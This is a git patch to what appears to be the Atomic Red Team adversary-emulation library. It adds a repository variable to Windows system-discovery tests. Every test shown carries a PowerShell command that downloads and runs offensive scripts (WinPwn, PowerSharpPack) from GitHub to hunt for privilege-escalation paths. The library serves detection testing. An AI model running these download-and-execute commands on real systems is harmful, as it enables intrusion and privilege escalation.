From cf673d487f435f29ce0f6375705b4c03c59c23e8 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Tue, 2 Sep 2025 16:08:20 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 10 ++++++++++ atomics/Indexes/windows-index.yaml | 10 ++++++++++ atomics/T1082/T1082.md | 10 ++++++++++ 3 files changed, 30 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index cc682f65..c266264a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -107445,6 +107445,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') winPEAS -noninteractive -consoleoutput name: powershell @@ -107456,6 +107457,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') itm4nprivesc -noninteractive -consoleoutput name: powershell @@ -107466,6 +107468,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') oldchecks -noninteractive -consoleoutput cleanup_command: |- @@ -107482,6 +107485,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') otherchecks -noninteractive -consoleoutput name: powershell @@ -107493,6 +107497,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Generalrecon -consoleoutput -noninteractive name: powershell @@ -107504,6 +107509,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Morerecon -noninteractive -consoleoutput name: powershell @@ -107515,6 +107521,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') RBCD-Check -consoleoutput -noninteractive name: powershell @@ -107526,6 +107533,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1') Invoke-watson name: powershell @@ -107537,6 +107545,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1') Invoke-SharpUp -command "audit" name: powershell @@ -107550,6 +107559,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1') Invoke-Seatbelt -Command "-group=all" name: powershell diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index e607fe49..fe171edb 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -88136,6 +88136,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') winPEAS -noninteractive -consoleoutput name: powershell @@ -88147,6 +88148,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') itm4nprivesc -noninteractive -consoleoutput name: powershell @@ -88157,6 +88159,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') oldchecks -noninteractive -consoleoutput cleanup_command: |- @@ -88173,6 +88176,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') otherchecks -noninteractive -consoleoutput name: powershell @@ -88184,6 +88188,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Generalrecon -consoleoutput -noninteractive name: powershell @@ -88195,6 +88200,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Morerecon -noninteractive -consoleoutput name: powershell @@ -88206,6 +88212,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') RBCD-Check -consoleoutput -noninteractive name: powershell @@ -88217,6 +88224,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1') Invoke-watson name: powershell @@ -88228,6 +88236,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1') Invoke-SharpUp -command "audit" name: powershell @@ -88241,6 +88250,7 @@ discovery: - windows executor: command: |- + $S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1') Invoke-Seatbelt -Command "-group=all" name: powershell diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 54000d3a..4f4fa93a 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -527,6 +527,7 @@ Discover Local Privilege Escalation possibilities using winPEAS function of WinP ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') winPEAS -noninteractive -consoleoutput ``` @@ -556,6 +557,7 @@ Discover Local Privilege Escalation possibilities using itm4nprivesc function of ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') itm4nprivesc -noninteractive -consoleoutput ``` @@ -585,6 +587,7 @@ Powersploits privesc checks using oldchecks function of WinPwn ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') oldchecks -noninteractive -consoleoutput ``` @@ -622,6 +625,7 @@ General privesc checks using the otherchecks function of WinPwn ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') otherchecks -noninteractive -consoleoutput ``` @@ -651,6 +655,7 @@ Collect general computer informations via GeneralRecon function of WinPwn ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Generalrecon -consoleoutput -noninteractive ``` @@ -680,6 +685,7 @@ Gathers local system information using the Morerecon function of WinPwn ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Morerecon -noninteractive -consoleoutput ``` @@ -709,6 +715,7 @@ Search for Resource-Based Constrained Delegation attack paths using RBCD-Check f ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') RBCD-Check -consoleoutput -noninteractive ``` @@ -738,6 +745,7 @@ PowerSharpPack - Watson searching for missing windows patches technique via fun ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1') Invoke-watson ``` @@ -767,6 +775,7 @@ PowerSharpPack - Sharpup checking common Privesc vectors technique via function ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1') Invoke-SharpUp -command "audit" ``` @@ -798,6 +807,7 @@ PowerSharpPack - Seatbelt technique via function of WinPwn. ```powershell +$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1') Invoke-Seatbelt -Command "-group=all" ```